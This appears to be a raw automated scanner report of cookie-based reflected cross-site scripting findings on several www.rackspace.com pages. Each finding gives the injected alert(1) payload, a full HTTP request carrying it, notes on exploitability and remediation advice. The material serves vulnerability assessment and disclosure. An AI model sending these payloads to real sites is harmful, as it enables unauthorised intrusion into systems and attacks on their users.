chatslider=Df0e18"><script>alert(1)</script>ce7f3ffd4c4; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82732"%3balert(1)//fd3162fa4ba was submitted in the chatslider cookie. This input was echoed as 82732";alert(1)//fd3162fa4ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/links.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D82732"%3balert(1)//fd3162fa4ba; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cbe2"><script>alert(1)</script>970c3f8f90c was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/mediacenter/links.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f86cbe2"><script>alert(1)</script>970c3f8f90c; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25e72"%3balert(1)//f54b9ea5589 was submitted in the IS_UASrackuid cookie. This input was echoed as 25e72";alert(1)//f54b9ea5589 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/mediacenter/links.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f825e72"%3balert(1)//f54b9ea5589; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4c34"><script>alert(1)</script>fbfbc9a1925 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/mediacenter/links.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Da4c34"><script>alert(1)</script>fbfbc9a1925; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 496a2"%3balert(1)//c8dcf4a1dcd was submitted in the chatslider cookie. This input was echoed as 496a2";alert(1)//c8dcf4a1dcd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/mediacenter/links.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D496a2"%3balert(1)//c8dcf4a1dcd; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b60f</script><script>alert(1)</script>590259cb859 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/mediacenter/release.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d8b60f</script><script>alert(1)</script>590259cb859; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2ecf"><script>alert(1)</script>3beed6b57a was submitted in the IS_UASrackuid cookie. This input was echoed as a2ecf\"><script>alert(1)</script>3beed6b57a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/mediacenter/release.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41da2ecf"><script>alert(1)</script>3beed6b57a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1587b"><script>alert(1)</script>ff408ef8b5c was submitted in the chatslider cookie. This input was echoed as 1587b\"><script>alert(1)</script>ff408ef8b5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/mediacenter/release.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A1587b"><script>alert(1)</script>ff408ef8b5c; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9940b</script><script>alert(1)</script>005710106ab was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/mediacenter/release.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A9940b</script><script>alert(1)</script>005710106ab; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36f78"><script>alert(1)</script>2d685035c6a was submitted in the IS_UASrackuid cookie. This input was echoed as 36f78\"><script>alert(1)</script>2d685035c6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/newsroom/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f836f78"><script>alert(1)</script>2d685035c6a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abe90</script><script>alert(1)</script>2c13c6486d4 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/newsroom/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8abe90</script><script>alert(1)</script>2c13c6486d4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cbce</script><script>alert(1)</script>e9d2b942ac3 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/newsroom/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D1cbce</script><script>alert(1)</script>e9d2b942ac3; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d431d"><script>alert(1)</script>34a5e4599f8 was submitted in the chatslider cookie. This input was echoed as d431d\"><script>alert(1)</script>34a5e4599f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/newsroom/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dd431d"><script>alert(1)</script>34a5e4599f8; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
